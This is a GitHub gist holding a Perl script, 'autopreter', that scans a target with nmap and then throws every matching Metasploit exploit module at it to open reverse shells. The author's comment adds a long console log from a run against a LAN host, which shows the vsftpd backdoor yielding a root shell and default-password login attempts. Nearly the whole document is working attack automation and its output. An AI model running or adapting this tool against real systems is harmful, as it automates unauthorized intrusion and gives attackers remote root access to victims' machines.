Skip to content

Instantly share code, notes, and snippets.

@oxagast
Last active November 24, 2020 17:18
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save oxagast/a6c340cf4e8b844af490cd678563611a to your computer and use it in GitHub Desktop.
Save oxagast/a6c340cf4e8b844af490cd678563611a to your computer and use it in GitHub Desktop.
Automatically generate a custom metasploit.rc resource targeted at an address.
#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ( $path !~ m/metasploit/ ) {
print("err: Your current working directory must be metasploit's.\n");
exit(1);
}
print("autopreter by oxagast\n");
if ( $#ARGV < 1 ) {
print("Useage: ./autopreter.pl <remoteip> <yourip>\n\n");
print(" If you can't get a shell, your firewall may be blocking it\n");
print(" Please allow 15 minutes for the process to complete...\n");
print(" Once sessions are displayed, if you have an active session\n");
print(" type sessions 1\n");
exit(1);
}
#if(`id` !~ m/root/) {
# print("err: Must be run as root on the local machine.\n");
# exit(1);
#}
my $lhost = $ARGV[1];
my $rhost = $ARGV[0];
my $pid = $$;
print("Trying to spawn a shell from $rhost...\n");
print("Scanning $rhost for open ports...\n");
system("nmap $rhost -oG masspwn.$pid.nmap >/dev/null");
my $nms = `cat masspwn.$pid.nmap`;
my @nmap;
@nmap = split( "\n", $nms );
@nmap[1] =~ m/Host: (\d+\.\d+\.\d+\.\d+)/;
$rhost = $1;
my @port;
my @nport;
my @modules;
@port = split( "/open", @nmap[2] );
@port[0] =~ s/.*Ports: //;
push( @nport, @port[0] );
foreach (@port) {
$_ =~ m/.*, (\d+)/;
push( @nport, $1 );
}
if ( scalar(@nport) - 1 >= 1 ) {
foreach (@nport) {
my $curport = $_;
my @moduledir =
`grep RPORT modules/ -R | grep \\($curport\\) | grep exploit`;
foreach (@moduledir) {
my $curmod = $_;
if ( ( $curmod !~ m/chain_reply/ ) && ( $curmod !~ m/trans2open/ ) )
{
$curmod =~ m/.*\/(exploit.*)\.rb\:.*/;
push( @modules, $1 );
}
}
}
my @umods;
my %seen;
foreach my $value (@modules) {
if ( !$seen{$value} ) {
push @umods, $value;
$seen{$value} = 1;
}
}
#@nmap[2] =~ m/.*OS: (\w+) /;
#my $os = $1;
#my $los = lc($os);
my $handler = 2000;
my $fh;
my $putdown = 0;
print "Generating the resource script...\n";
open( $fh, ">", "masspwn.$pid.msf" );
foreach (@umods) {
print( $fh "use $_\n" );
print( $fh "set RHOST $rhost\n" );
print( $fh "set LHOST $lhost\n" );
print( $fh "set LPORT $handler\n" );
print( $fh "set ExitOnSession false\n" );
print( $fh "set PAYLOAD generic_shell_reverse\n" );
print( $fh "exploit -j -z\n" );
print( $fh "back\n" );
$handler++;
$putdown = 1;
}
if ( $putdown == 1 ) {
print( $fh "jobs -K\n" );
print( $fh "sleep 15\n" );
print( $fh "sessions\n" );
print "Trying to pop a shell...\n";
system("./msfconsole -r masspwn.$pid.msf");
}
else {
$putdown = 0;
print "No open ports, won't be exploited.\n";
}
}
unlink("masspwn.$pid.msf");
unlink("masspwn.$pid.nmap");
exit(0);
@oxagast
Copy link
Author

oxagast commented Aug 16, 2019

This seems to be working after commit a few min ago. Tries to use a shotgun approach towards exploitation, utilizing Metasploit modules on the backend. Must be run from the metasploit-framework directory. Allow up to 15 minutes for the process to complete. If you kill Metasploit after you get a shell session but before it completes you may have lost your chance at a shell (many exploits crash the service they exploit after they're done).

[marshall@likon] {00:45} [metasploit-framework] $ sudo ../autopreter.pl 192.168.1.245 192.168.1.207
autopreter by oxagast
trying to spawn a shell from 192.168.1.245...


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v5.0.42-dev-015651dd08               ]
+ -- --=[ 1914 exploits - 1074 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion                                       ]

[*] Processing masspwn.msf for ERB directives.
resource (masspwn.msf)> use exploits/windows/ftp/ability_server_stor
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2001
LPORT => 2001
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ftp/comsnd_ftpd_fmtstr
[*] Started reverse TCP handler on 192.168.1.207:2001
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2002
LPORT => 2002
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ftp/httpdx_tolog_format
[*] Started reverse TCP handler on 192.168.1.207:2002
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2003
LPORT => 2003
resource (masspwn.msf)> set ExitOnSession false
[*] 192.168.1.245:21 - Triggering overflow...
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ftp/vermillion_ftpd_port
[*] Started reverse TCP handler on 192.168.1.207:2003
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - Automatically detecting the target...
[*] 192.168.1.245:21 - No matching target
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2004
LPORT => 2004
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ftp/sami_ftpd_user
[*] Started reverse TCP handler on 192.168.1.207:2004
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - Automatically detecting the target...
[*] 192.168.1.245:21 - No matching target
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2005
LPORT => 2005
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] 192.168.1.245:21 - Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ftp/ms09_053_ftpd_nlst
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2006
LPORT => 2006
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ftp/dreamftp_format
[*] Started reverse TCP handler on 192.168.1.207:2006
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - 550 Create directory operation failed.
[-] 192.168.1.245:21 - The root directory of the FTP server is not writeable
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2007
LPORT => 2007
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/freebsd/ftp/proftp_telnet_iac
[*] Started reverse TCP handler on 192.168.1.207:2007
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2008
LPORT => 2008
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 6.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/ftp/vsftpd_234_backdoor
[*] Started reverse TCP handler on 192.168.1.207:2008
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - Automatically detecting the target...
[-] 192.168.1.245:21 - Exploit aborted due to failure: no-target: No matching target
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2009
LPORT => 2009
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ftp/proftp_telnet_iac
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.245:21 - USER: 331 Please specify the password.
[+] 192.168.1.245:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.245:21 - UID: uid=0(root) gid=0(root)
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2010
LPORT => 2010
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/ftp/wuftpd_site_exec_format
[*] Started reverse TCP handler on 192.168.1.207:2010
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - Automatically detecting the target...
[-] 192.168.1.245:21 - Exploit aborted due to failure: no-target: No matching target
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2011
LPORT => 2011
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 9.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/ftp/pureftpd_bash_env_exec
[*] Started reverse TCP handler on 192.168.1.207:2011
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:21 - Automatically detecting the target...
[-] 192.168.1.245:21 - Exploit aborted due to failure: no-target: No matching target
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2012
LPORT => 2012
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.207:41547 -> 192.168.1.245:6200) at 2019-08-16 00:46:23 -0400
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 10.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/mainframe/ftp/ftp_jcl_creds
[*] Started reverse TCP handler on 192.168.1.207:2012
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2013
LPORT => 2013
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:21 - Command Stager progress -  59.88% done (497/830 bytes)
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 11.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ssh/freesshd_key_exchange
[*] Started reverse TCP handler on 192.168.1.207:2013
resource (masspwn.msf)> set RHOST 192.168.1.245
[+] 192.168.1.245:21 - Successfully connected to FTP server.
[+] 192.168.1.245:21 - Successfully switched to JES mode
[*] 192.168.1.245:21 - Uploading JCL file: IMCRPZMZ
[-] 192.168.1.245:21 - Exploit aborted due to failure: unexpected-reply: 192.168.1.245:21 - Failed to upload JCL to FTP server
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2014
LPORT => 2014
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:21 - Command Stager progress - 100.60% done (835/830 bytes)
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ssh/freeftpd_key_exchange
[*] Started reverse TCP handler on 192.168.1.207:2014
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:22 - Not running a vulnerable version...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2015
LPORT => 2015
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 13.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/ssh/freesshd_authbypass
[*] Started reverse TCP handler on 192.168.1.207:2015
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:22 - Not running a vulnerable version...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2016
LPORT => 2016
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 14.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/ssh/array_vxag_vapv_privkey_privesc
[*] Started reverse TCP handler on 192.168.1.207:2016
resource (masspwn.msf)> set RHOST 192.168.1.245
[-] 192.168.1.245:22 - Exploit aborted due to failure: not-vulnerable: Target is most likely not vulnerable!
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2017
LPORT => 2017
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 15.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/ssh/tectia_passwd_changereq
[*] Started reverse TCP double handler on 192.168.1.207:2017
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:22 - Attempt to login with 'sync:SSH PRIVATE KEY'
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2018
LPORT => 2018
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: no-access: 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 16.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2019
LPORT => 2019
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:22 - 192.168.1.245:22 - Sending USERAUTH Change request...
[*] 192.168.1.245:22 - 192.168.1.245:22 - Auths that can continue: 51
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 17.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/mercurial_ssh_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2020
LPORT => 2020
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] Exploit failed: The following options failed to validate: SSH_PRIV_KEY_FILE.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/ceragon_fibeair_known_privkey
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2021
LPORT => 2021
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 18.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/vmware_vdp_known_privkey
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2022
LPORT => 2022
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 19.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/symantec_smg_ssh
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2023
LPORT => 2023
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 20.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/exagrid_known_privkey
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:22 - Attempt to login...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2024
LPORT => 2024
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 21.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/quantum_dxi_known_privkey
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2025
LPORT => 2025
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 22.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/quantum_vmpro_backdoor
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2026
LPORT => 2026
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 23.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/ssh/f5_bigip_known_privkey
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:22 - Attempt to login...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2027
LPORT => 2027
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 24.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/ssh/sshexec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2028
LPORT => 2028
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 25.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/apple_ios/ssh/cydia_default_ssh
[*] Started reverse TCP handler on 192.168.1.207:2028
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2029
LPORT => 2029
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: no-access: Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 26.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/solaris/telnet/fuser
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:22 - Attempt to login as 'root' with password 'alpine'
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2030
LPORT => 2030
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 27.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/solaris/telnet/ttyprompt
[*] Started reverse TCP double handler on 192.168.1.207:2030
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:23 - Setting USER environment variable...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2031
LPORT => 2031
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:22 SSH - Failed authentication
[*] 192.168.1.245:22 - Attempt to login as 'mobile' with password 'dottie'
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 28.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/proxy/ccproxy_telnet_ping
[*] Started reverse TCP double handler on 192.168.1.207:2031
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:23 - Setting TTYPROMPT...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2032
LPORT => 2032
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:23 - Sending username...
[-] 192.168.1.245:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 29.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/scada/procyon_core_server
[*] Started reverse TCP handler on 192.168.1.207:2032
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2033
LPORT => 2033
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 30.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/telnet/gamsoft_telsrv_username
[*] Started reverse TCP handler on 192.168.1.207:2033
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:23 - Sending request...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2034
LPORT => 2034
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 31.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/misc/polycom_hdx_auth_bypass
[*] Started reverse TCP handler on 192.168.1.207:2034
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:23 - Trying target Windows 2000 Pro SP0/4 English REMOTE on host 192.168.1.245:23...
[*] 192.168.1.245:23 - Connected to telnet service... waiting several seconds.
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2035
LPORT => 2035
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/misc/polycom_hdx_traceroute_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2036
LPORT => 2036
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse double SSL handler on 192.168.1.207:2035
[*] 192.168.1.245:23 - Starting Authentication bypass with 6 threads with 100 max connections
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 33.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/polycom_hdx_auth_bypass
[*] Started reverse TCP double handler on 192.168.1.207:2036
